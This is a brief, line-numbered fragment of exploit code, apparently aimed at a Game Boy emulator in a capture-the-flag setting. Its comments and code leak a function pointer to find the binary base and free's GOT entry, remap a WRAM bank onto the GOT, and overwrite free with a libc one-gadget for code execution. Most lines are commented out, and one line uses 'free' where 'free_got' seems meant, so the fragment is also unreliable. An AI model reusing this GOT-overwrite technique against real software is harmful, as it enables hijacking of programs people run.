1 2// /* causes segfault (TESTED!) */ 3 // // *op0x00_gb = 0; 4 5 // /* leak function pointer and base / got */ 6 // op0x00 = *op0x00_gb; 7 // base = op0x00 - 0x1d420; 8 // free_got = base + 0x4ad78; 9 10 // /* use processor registers to read / write */ 11 // processor + 0x2068 12 13 // /* reset wram bank to point to GOT */ 14 wrambanks = processor_addr + 0x126a0; 15 target_index = (free_got - wrambanks) / 0x1000; 16 if ((free - wrambanks) % 0x1000 != 0) 17 target_index -= 1; 18 19 // /* replace free with one gadget */ 20 // free_gb = (void*)free_got - (wrambanks - target_index * 0x1000) + 0xD000; 21 // free = *(free_gb); 22 // libc = free - 0x9a6d0; 23 // onegadget = libc + 0xe3afe; 24 25 // *free_gb = onegadget; 26